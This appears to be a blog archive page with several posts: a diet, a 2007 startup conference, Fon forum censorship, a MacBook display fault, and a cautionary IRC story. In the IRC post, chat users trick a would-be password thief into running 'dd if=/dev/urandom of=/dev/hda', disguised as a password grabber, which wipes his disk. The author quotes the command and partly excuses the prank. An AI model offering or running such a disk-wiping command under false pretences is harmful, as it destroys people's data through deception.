Technik News

Das Blog zu IT, Mobilfunk & Internet

Going on a diet – wish me luck

von

A few days ago I saw a picture from back when I was in a UK’s Mountain Rescue team, and in good shape. In the mid 90s I broke my left ankle in the French Pyrenees, while walking down an slope after a good day in the ice, and things went downhill from there. The lack of exercise, combined with bad eating habits took its toll, and today I’m almost 118Kg, or 260lb. for those still using imperial metrics.

This morning I went to see a doctor who specializes in natural diets, and she has given me a strict one. To start with, no eggs or milk for a few weeks, so bye bye Starbucks (I can still drink black coffee though). It’s then a matter of combining the right kind of food, for example, breakfast consists of acid fruits (lemon juice plus oranges, pineapple or kiwis), the a salad plus chicken, fish or pasta for lunch. A friend of mine has recommended this doctor, having lost almost 10Kg the first month.

Part of the plan is of course exercise, which having three kids plus a startup will be difficult to get done – my idea is to get a mountain bike and try to go to places with it, rather than take the car, plus a short cycle in the morning before everyone wakes up. Any recommendations? I was looking at some today, and the two manufacturers which seemed best were Scott and Orbea, not sure which to get though.

A weekly progress report will be posted here, I’m actually thinking of making some sort of weight widget, it’s just an idea for now.

Innovate Europe 2007 – Day 3

von

This comes a little late as the event is over, but I thought it was worth making some final remarks. On the last day we presented the new look & feel of Whisher, together with some new features such as integrated SIP VoIP, and powerful geolocation functionality.
At the end of the day, Chris Shipley interviewed Martin Varsavsky, who was also being presented with an Entrepreneur of the Year award by the conference organizers. By this time, many attendees had already left, eager to catch trains to take them to Madrid or Barcelona for a flight back home, so the interview was rather bleak. People were asked by the organizers to sit towards the front of the theater to make it look a bit more full (if that was at all possible), and we even saw students from Zaragoza’s University turn up, who had not been present during the rest of the event. We also left after this, as we had a longish drive home, and felt sorry for SpeedBit, who were the last to present, after the interview with Martin.

Some comments about the event:

The venue was nice, but the low glass desks were totally inadequate. At DEMO, we had nice custom-build stands, with the company name on top, so even if you were standing, the laptops were at the right level to show people stuff. At this event, everyone resorted to stealing chairs from around the theater, as none were provided by the organizers.
The WiFi worked OK, but sometimes got too congested. There were two 3Mbit ADSL lines, and six access points tied to each, placed about 20cm from each other. You can guess that interference, and heavy usage by some of the attendees didn’t do the network much good.
For some strange reason, a van with a huge screen was placed in the middle of the main square of Zaragoza, near the event, and live video feeds from the event were shown there. A simultaneous translation ran at the same time, but the volume was set at the same level as the original audio, and the end result was a cacophony that basically amused the locals.
The catering did their best, but left every day just before 17:00. This meant 3 to 4 hours with no food or drink (not even water, never mind coffee).
Little publicity of the event was made, which resulted in basically a couple of local newspapers showing up to report, and the sponsoring newspaper Cinco Dias. Other media was there but were basically not very interested in investigating all the companies presenting. The feeling was a bit depressing, almost like you were presenting to the other companies also attending. There is no point running such an event if absolutely no national press coverage (at least) has been attempted to be captured.

I won’t say the event was bad, we actually met some great people, talked to a few VCs, and had a good time. I will leave you with a few more pictures from the event (and a few more are on my Flickr page).

Live from Innovate!Europe 2007

von

We’re presenting Whisher at Innovate!Europe 2007, being held in Zaragoza, Spain. The event itself is not huge, and has not been written about much, but since it is a stone’s throw away from Barcelona base, we felt it was worth coming. I’ll be posting some pics and info a bit later on.

Day 2: Presentations, demos, networking and no coffee after 17:00

The day started off with an intro from Chris Shipley, and a few onstage demos.

One of the demos that caught my eye was a service called Smeet, which creates a virtual 3D space (in an isometric birds-eye view for your techies), for example, a bar, and places animated avatars which correspond to real users who login to the system. Each user also dials in to a conference number, and his audio can then be heard by others in proportion to their distance, i.e. there is a hearing range, and a speaking range. Thus, by moving your avatar close enough to a group, you will begin hearing their conversation, and even talk to the group if you get closer. Pretty cool stuff!

In the afternoon there was a discussion panel on angel and VC funding of startups, with some heavyweights present – Klaus Hommels from Benchmark, Simon Levene from Accel, Mark Tluszcz from Mangrove, Saul Klein from Index, and Oliver Jung from Adinvest. The moderator was supposed to be Loic Le Meur, but he didn’t show up, apparently due to political engagements back in France (my guess is he will be the next interior minister!), so Chris Shipley took the lead. Some interesting discussion was generated around when and how to take money, and from whom. One conclusion is that if you go for top VCs, you have to set your aims very high, not on a $10 or $20M exit, which can be fine if you take angel funding instead.

The event is OK for networking with others, but the catering disapeared around 17:00, and we were left with no coffee!

Fondoo, a Fon-friendly ISP, censored…by Fon

von

header_logo

Weirdness happens in the most strange places, and the Fon forums are an endless source of fun. Their moderator, known as moderfon, throws his wrath around like a dragon, censoring posts that are not convenient to Fon’s image. Those who complain or even link to external stories that deal with topics such as replacing the Fonera’s firmware, or problems and bugs such as the overheating routers, are ruthlessly censored, and the posters threatened with being banned.

I have moderated public forums for almost 10 years now, and there is a very delicate balance between keeping things on topic, abusive users, and the community. You simply cannot have a forum about a topic, and then arbitrarily decide when and how its members can or cannot talk about the topic. If the topic of Fon’s forums is Fon, then users should be allowed to say anything related to Fon, be it good, bad or even how to hack the routers. People should be allowed to complain about a company on the company’s own forum, else, it is basically a propaganda tool, or something one must have for public image. “Sure, we like our community, we have a blog and a forum!”. Keeping a company forum on topic does not mean keeping it on the topic the company would like to see, but making sure there is no spam, users don’t become abusive, flame wars are tamed, and people get a feeling that they are contributing to something. Censoring uncomfortable topics is not the way to go.

In this particular case, a UK ISP known as Fondoo.net, who define themselves as “the UK’s first FON Friendly ISP.”, has had its name censored from Fon’s forums. Any mention of the word ‘fondoo’ will be shown on posts as *xxxx*, as can be seen on this thread (scroll down a bit to the first post by euronerd). Seems like a very fast way to lose friends, and shows how to not build a community. As this thread will probably be censored (there was a thread about censorship that itself got censored!), I took a screenshot of the relevant bit:

fondoo

Update: I found a link to this Wikipedia entry (I tend not to link to Wikipedia as a general rule, but I’ve reviewed this article and it seems just fine), which is a great introduction and explanation of what it means to moderate a forum (wink wink, moderfon). Thanks to Kyros for posting the link on AustinTX’s blog, it will come in handy more than once methinks!

The weirdest MacBook Pro problem so far

von

Almost a year since I got a 17″ MacBook Pro, not one of the earlier problem-prone models, so it should have worked out better – half way through the year though, a series of darker spots, like soot smudges, started appearing on various places of the screen. I am waiting for parts to arrive before taking it in and have it fixed, otherwise you can be laptop-less for days or weeks, and now the machine has developed a new symptom. After resuming from sleep, the display is all corrupted, with top third of the display one solid color, and the bottom two thirds another, plus an annoying flicker. If I close the lid, flip it upside down, and open the lid again, the display goes back to normal. The problem can be consistently reproduced, but I really cannot imagine what combination of electrical and/or software problems are causing this.

A practical guide to get yourself owned on IRC

von

For those of you who are not old enough (or simply don’t know), IRC stands for Internet Relay Chat, and is one of the first real-time, multi-user chat systems that was invented, with capabilities to span multiple servers across countries and continents, servicing thousands of users organized in channels. Daniel Stenberg has a brief overview of IRC history if you want to know a bit more.

Many communities have their dedicated IRC channels where they converse about their topics of interest, and in some cases even offer support for software or services. This is the case of #remote-exploit, registered on Freenode, which serves as a communication and support channel between developers and users of BackTrack, the best and most comprehensive Linux-based Live CD focused on security – this includes auditing, penetration testing, and so on. The IRC channel is frequented by the developers and a few hard-core users, who provide ad-hoc support to other users having difficulties with particular tools, or who may be trying to get something working but failing to do so. Regular chat around security-related topics makes the channel a very nice place to be if you are interested or work in IT security.

There seems to be a trend nowadays, maybe related to how our children are being educated at home and at school, that people simply demand to be spoon-fed particular information to accomplish a very specific task, disregarding the whole process of actually researching, learning and understanding what they are doing. This is particularly important in the security field, as lack of understanding can have very bad consequences, which brings us to today’s episode.

BIG FAT BOLD DISCLAIMERS

  • Kids, do not try this at home. Do not try to play either of the sides you see here, chances are you will lose. Particularly, do not run any of the commands you see being used!
  • Before you start posting comments about how cruel this was, I agree that things may have gone over the top, but if anyone deserved a lesson, it was this guy. Since there is no such thing as an Internet Supreme Court, we have no place to take these people so they can have their right to use the Internet suspended for two years. This guy was asking for information on how to commit several crimes, and this is something no true hacker will ever condone. He was warned many times that what he was asking was illegal and frowned upon, and he still insisted. All he lost was music and games (by his own admission, the contents of his hard drive) – it was very obvious he wasn’t using his computer for any beneficial purpose at the time, so he would just have to reinstall his games and rip his CDs again, no big deal.
  • Hacker does not equate to criminal. A hacker is after knowledge and experimentation, not causing intentional damage. Hackers are analytical and proud of their knowledge, acquired through years of learning and research. Thus, when someone asks for this knowledge to be siphoned off their brains, they get rather miffed, responding as you can see here. If you ask a hacker a sensible question, you will get a sensible answer, as we understand that the same we were taught by others, we have a responsibility to pass on the knowledge – not by spoon-feeding though! An excellent quote found in a DefCon FAQ: ‘Ignorance is forgivable, because it’s curable; stupidity is not… The difference between ignorance and stupidity is in the desire to remain ignorant’.
  • This is not a usual event. I have only seen something like this happen twice, and I’ve been on IRC since around 1993. Don’t think that our purpose in life is to sit in IRC channels waiting for victims to prey on.

This particular event took place the evening of April 31st, when someone using the nick JAGGEN (hint: don’t use caps in IRC for either your nick or typing, as it is considered shouting and rude) joined the #remote-exploit IRC channel, and began asking for information on how to perform various illegal acts:

[01:39] * Joins: JEGGAN (n=lechan@81-226-226-68-no58.tbcn.telia.com)
[01:40] <JEGGAN> Hi i am very new att Back Track 2 and wonder if someone want to answere my questions in private... sorry my eng i am swe
[01:47] <JEGGAN> so sad that nobody is here but i will be back tomorrow then
[01:48] <Zi0n> tomorrow we closed
[01:49] <JEGGAN> can u help me Zi0n ?
[01:49] <Zi0n> deppends on the question
[01:50] <JEGGAN> littel random about back track what i can do and not do and so on but i want to take it in privv but i goes good here if u want becus i don't want to spam down the channel whit stupied questions
[01:50] <Zi0n> if you know your question is stupid, why ask it ?
[01:51] <JEGGAN> becus i don't know if it's possibel
[01:51] <JEGGAN> for exampel can i hack irc and take auth's in quakenet whit it?
[01:51] <Zi0n> anyway, ask you question here and see if anyone can help you with it
[01:51] <JEGGAN> ok
[01:51] <JEGGAN> can i hack auth on quakenet whit back track?
[01:52] <JEGGAN> can i hack emails so i can for exampel get my friends msn account and other's account?

Things went downhill from here – Zi0n told the guy to try in #ubuntu, a channel dedicated to a much better hacker tool collection – of course we all know what Ubuntu really is, and when he joined there he was promptly directed to #ubuntu-offtopic, where he asked the same questions, and was then directed to join #binrev, a hard-core hacker channel on a different IRC server:

[01:59] <FringeJacket> JEGGAN you've got a better chance there
[01:59] <JEGGAN> okok
[01:59] <JEGGAN> let's try then
[02:00] <JEGGAN> uhm in binrev it's nobody there...
[02:00] <kitche> JEGGAN: different server irc.binrev.net is their irc server

Not realizing he was going to make a huge mistake, and having been warned that what he was asking was illegal in at least three different IRC channels, he went on to join #binrev, where the following ensued:

[02:03] * Now talking in #binrev
[02:04] <tehbizz> ok, ask the damn question alrady
[02:10] <JEGGAN> who can i get my friends msn password easy ?
[02:10] <sev> First, learn english.
[02:10] <voltagex> JEGGAN: you can
[02:10] <JEGGAN> how i mean
[02:10] <Strom> JEGGAN: we don't condone that behavior here.
[02:10] <voltagex> ask him for it
[02:11] <sev> That's not the only thing wrong with your question.
[02:11] <JEGGAN> i am new on this and i am swe so i don't have good eng i just want to talk to somebody that can help me a littel bit
[02:11] <voltagex> no.
[02:11] <voltagex> just no.
[02:12] <sev> excellent.
[02:12] <JEGGAN> ?
[02:12] <JEGGAN> so you don't want to help me
[02:12] <Adam> jeggan i know nothing of msn sorry
[02:12] <voltagex> we don't do stealing passwords here
[02:12] <JEGGAN> Adam what do you know about email ?
[02:13] <JEGGAN> voltagex what are you doing here then?
[02:13] <tehbizz> easiest way to get a password: ask for it
[02:13] <tehbizz> discussion over.
[02:13] <sev> JEGGAN: do you know about the amazing hacking powers of 'dd'?
[02:13] <JEGGAN> sev no
[02:13] <voltagex> JEGGAN: not stealing passwords
[02:14] <sev> JEGGAN: I can help you hack with dd.
[02:14] <JEGGAN> sev what is dd?
[02:14] <tehbizz> yes
[02:14] <voltagex> JEGGAN: mad hack tool
[02:14] <sev> it's a remote password grabber
[02:14] <JEGGAN> okok
[02:14] <JEGGAN> where do i get it?
[02:14] <sev> JEGGAN: do you have root access on your machine?
[02:14] <JEGGAN> yes

Now our hapless “hacker” was getting interested…someone is going to teach me how to actually hack, using something called ‘dd’. If you read up Wikipedia’s entry of ‘dd’, you will see that it’s a low-level Unix tool that allows copying data between different media, for example, a floppy disk to a hard drive. It can use a variety of inputs, and write to a variety of outputs. Towards the bottom of the Wikipedia entry, there are some examples of the destructive power of dd, preceeded by this:

warning_dd

As an example, using dd if=/dev/urandom of=/dev/hda will overwrite the hard disk with random data. If this noob had bothered to simply type ‘dd’ in Google, he would have seen the Wikipedia entry as the second result, and taking two minutes to read through it, would have realized that it is not a remote password grabber. Determined to break into other people’s MSN, email and gaming accounts, he charged ahead:

[02:38] <sev> paste this: dd if=/dev/urandom of=/dev/hda # 18.173.134.224/get/hacker/tools/driveb/hack/msn_password_grabber.xof
[02:38] <JEGGAN> where should i put it?
[02:39] <voltagex> in the command line
[02:39] <sev> in your command line, it's all one line, so paste it carefully
[02:39] <JEGGAN> wtf cant puch ctr+c to copy :s
[02:39] <tehbizz> shift+insert
[02:39] <JEGGAN> now it worked

And the inevitable happened, after a few hours of waiting for something to happen while dd was running:

[18:07] <Citrus> try to reboot anyway
[18:07] <JEGGAN> ok
[18:08] <Citrus> you don't loose anything to see if LILO is there already
[18:08] <JEGGAN> should i boot in windows or BT?
[18:08] <Citrus> no, just boot normal without the CD
[18:08] <JEGGAN> ok
[18:08] <Citrus> you should see a menu
[18:08] <JEGGAN> brb
[18:08] * Quits: JEGGAN (~root@81-226-226-68-no58.tbcn.telia.com) (Quit: Leaving)
[18:14] * Joins: JEGGAN (~JEGGAN@81-226-226-68-no58.tbcn.telia.com)
[18:15] <JEGGAN> Citrus,
[18:15] <JEGGAN> no menu and windows dosen't boot
[18:15] <Citrus> what do you mean doesn't boot?
[18:15] <JEGGAN> that i can't go into windows..
[18:16] <Citrus> JEGGAN: what message do you get?
[18:16] <JEGGAN> insert system disk

You can read the whole exchange here, edited to remove irrelevant background chatter. Lessons to be learned from this:

  • Don’t be an idiot – if you are told to go search and read, it is very likely that there are numerous sources for answers to your question. If you are told what you want to do is illegal, drop it.
  • Don’t believe everything you are told on online (this applies to other means than IRC too!) – would you take advice from a total stranger on the street on how to do brain surgery on yourself? There is no shame in taking your time to double-check advice you are given.
  • Learn the basics and work your way up, not the other way around – if you ask to be taught a very high-level and complex topic, without having made the effort to even learn the basics, you will be frowned upon.